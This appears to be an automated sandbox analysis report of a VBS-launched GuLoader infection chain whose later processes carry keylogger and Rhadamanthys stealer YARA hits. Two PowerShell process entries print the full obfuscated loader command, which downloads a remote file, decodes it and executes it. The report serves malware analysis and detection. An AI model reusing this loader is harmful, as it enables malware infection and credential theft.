                                                                                    Data Ascii: q2U@BwWS-7@i9+i7wh-,yJ+ z3'S6gj!94qFA|Mg0Wu;7AY~//w&5a`H(0>kJRT(4JPawl[|Yb7Xg$D ;XWw|,!


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:06:47:44
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs"
                                                                                    Imagebase:0x7ff6ed260000
                                                                                    File size:170'496 bytes
                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:06:47:45
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;"
                                                                                    Imagebase:0x7ff7be880000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:06:47:45
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:06:47:48
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7e52b0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:06:47:59
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;"
                                                                                    Imagebase:0xba0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2552391162.0000000008590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2541535117.0000000005841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2552866056.000000000A363000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:06:48:17
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                    Imagebase:0xd40000
                                                                                    File size:516'608 bytes
                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.2585733508.0000000024FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000003.2576092102.00000000055F3000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:06:48:37
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\SysWOW64\dialer.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\dialer.exe"
                                                                                    Imagebase:0x510000
                                                                                    File size:32'256 bytes
                                                                                    MD5 hash:E4BD77FB64DDE78F1A95ECE09F6A9B85
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.2578876174.0000000005930000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.2578561473.0000000005710000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.2576375337.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.2666601703.0000000005685000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:27.8%
                                                                                      Total number of Nodes:18
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 8392 7ff848e8af80 8393 7ff848e8af97 8392->8393 8394 7ff848e8af8e 8392->8394 8394->8393 8395 7ff848e8b194 CoCreateInstance 8394->8395 8396 7ff848e8b1fb 8395->8396 8381 7ff848e8ad91 8382 7ff848e8adaf 8381->8382 8387 7ff848e896f0 8382->8387 8384 7ff848e8adc1 8385 7ff848e896f0 CoCreateInstance 8384->8385 8386 7ff848e8add3 8385->8386 8387->8384 8388 7ff848e8af80 8387->8388 8389 7ff848e8af97 8388->8389 8390 7ff848e8b194 CoCreateInstance 8388->8390 8389->8384 8391 7ff848e8b1fb 8390->8391 8391->8384 8397 7ff848e8e5b9 8398 7ff848e8e5bf IUnknown_QueryInterface_Proxy 8397->8398 8400 7ff848e8e678 8398->8400

                                                                                      Executed Functions

                                                                                      Function 00007FF848E89A6A Relevance: 15.2, Strings: 11, Instructions: 1410COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7n$(7n$07n$87n$@7n$@7n$H7n$P7n$x6n$x6n$6n
                                                                                      • API String ID: 0-2561439285
                                                                                      • Opcode ID: 0b842faa0fbff550446a851e9a3ba466cf1dfe592820566f717a07933ec9dd2c
                                                                                      • Instruction ID: 12a83c260a8407a9bcee9cfbc8dc60afd97898625d88a0431107f605ddc6cd54
                                                                                      • Opcode Fuzzy Hash: 0b842faa0fbff550446a851e9a3ba466cf1dfe592820566f717a07933ec9dd2c
                                                                                      • Instruction Fuzzy Hash: 05B24F30A1CA4A8FEB99EB28C8557A973E2FF55340F5441B9D40DC7296DF38AC82CB45
                                                                                      Function 00007FF848E8CA60 Relevance: 4.1, Strings: 2, Instructions: 1563COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 310 7ff848e8ca60-7ff848e8cd2e call 7ff848e87ea0 321 7ff848e8cd30-7ff848e8cd53 310->321 322 7ff848e8cd5a-7ff848e8cd81 310->322 321->322 327 7ff848e8cd83-7ff848e8cd93 322->327 328 7ff848e8cd94-7ff848e8cd99 322->328 329 7ff848e8cd9b-7ff848e8cdb9 328->329 330 7ff848e8cdbc-7ff848e8cdc9 328->330 329->330 332 7ff848e8d5bb-7ff848e8d5c3 330->332 333 7ff848e8cdcf-7ff848e8cdd9 330->333 334 7ff848e8d5c5-7ff848e8d5cd 332->334 335 7ff848e8d61c-7ff848e8d62d 332->335 336 7ff848e8cddb-7ff848e8cdf7 call 7ff848e86dc8 333->336 337 7ff848e8ce1e 333->337 338 7ff848e8d5fe-7ff848e8d615 call 7ff848e87fe0 334->338 339 7ff848e8d5cf-7ff848e8d5e0 334->339 341 7ff848e8ce23 336->341 343 7ff848e8cdf9-7ff848e8ce03 336->343 337->341 338->335 351 7ff848e8d5e2-7ff848e8d5f7 call 7ff848e87fd0 339->351 352 7ff848e8d5f9 339->352 345 7ff848e8ce25-7ff848e8ce2f 341->345 343->337 347 7ff848e8ce05-7ff848e8ce1c call 7ff848e86dc8 343->347 349 7ff848e8cf72-7ff848e8cf75 345->349 350 7ff848e8ce35-7ff848e8ce3f 345->350 347->345 356 7ff848e8d092-7ff848e8d094 349->356 357 7ff848e8cf7b-7ff848e8cf85 349->357 350->337 355 7ff848e8ce41-7ff848e8ce5c 350->355 351->335 352->338 367 7ff848e8ce8b-7ff848e8cea3 355->367 368 7ff848e8ce5e-7ff848e8ce85 355->368 360 7ff848e8d240-7ff848e8d253 356->360 361 7ff848e8d09a-7ff848e8d14c 356->361 357->337 362 7ff848e8cf8b-7ff848e8cfb5 357->362 371 7ff848e8d255-7ff848e8d278 360->371 372 7ff848e8d27f-7ff848e8d2b9 360->372 400 7ff848e8d186-7ff848e8d18a 361->400 401 7ff848e8d14e-7ff848e8d158 361->401 377 7ff848e8cfe1-7ff848e8d032 362->377 378 7ff848e8cfb7-7ff848e8cfda 362->378 380 7ff848e8cea5-7ff848e8ceb0 367->380 381 7ff848e8cecf-7ff848e8cf07 367->381 368->349 368->367 371->372 388 7ff848e8d2bb-7ff848e8d308 372->388 389 7ff848e8d30d-7ff848e8d313 372->389 426 7ff848e8d039-7ff848e8d08a 377->426 378->377 390 7ff848e8ceb2-7ff848e8cec8 380->390 391 7ff848e8cf08-7ff848e8cf6d 380->391 381->391 388->389 397 7ff848e8d420-7ff848e8d452 388->397 389->397 398 7ff848e8d319-7ff848e8d41b 389->398 390->381 391->356 417 7ff848e8d458-7ff848e8d47b 397->417 418 7ff848e8d59a-7ff848e8d5a2 call 7ff848e8d62e 397->418 438 7ff848e8d5a3-7ff848e8d5b5 398->438 405 7ff848e8d1a7-7ff848e8d1ab 400->405 406 7ff848e8d18c-7ff848e8d19f 400->406 401->337 403 7ff848e8d15e-7ff848e8d184 401->403 403->405 411 7ff848e8d1ad-7ff848e8d1b7 405->411 412 7ff848e8d1ef-7ff848e8d1f9 405->412 406->405 411->337 421 7ff848e8d1bd-7ff848e8d1ed 411->421 412->337 416 7ff848e8d1ff-7ff848e8d227 412->416 441 7ff848e8d22f-7ff848e8d23b 416->441 432 7ff848e8d481-7ff848e8d4a9 417->432 433 7ff848e8d4fe 417->433 418->438 421->441 426->356 456 7ff848e8d57c-7ff848e8d594 432->456 457 7ff848e8d4af-7ff848e8d4ba 432->457 442 7ff848e8d503-7ff848e8d507 433->442 438->332 438->333 441->438 446 7ff848e8d528-7ff848e8d52c 442->446 447 7ff848e8d509-7ff848e8d50a 442->447 448 7ff848e8d550-7ff848e8d569 446->448 449 7ff848e8d52e-7ff848e8d54e 446->449 453 7ff848e8d50c-7ff848e8d526 447->453 474 7ff848e8d570-7ff848e8d575 448->474 449->474 453->446 456->417 456->418 457->453 465 7ff848e8d4bc-7ff848e8d4cd 457->465 465->442 470 7ff848e8d4cf-7ff848e8d4fc 465->470 470->446 474->456
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: x6n$x6n
                                                                                      • API String ID: 0-3933258741
                                                                                      • Opcode ID: dd9ba8cb8c3805bb2f6a54b2fbc3181e5b91a29e3fe7f9bb26eba4fc06e275e1
                                                                                      • Instruction ID: a454f4e3c2d539a12332e1cf61193137994b18d098923862e3e1c6c164020d0f
                                                                                      • Opcode Fuzzy Hash: dd9ba8cb8c3805bb2f6a54b2fbc3181e5b91a29e3fe7f9bb26eba4fc06e275e1
                                                                                      • Instruction Fuzzy Hash: 63729D30A1CA4A8FEB98EB28C4556B973E2FF99344F544179D40ED3296DF39A842CB44
                                                                                      Function 00007FF848E95A76 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
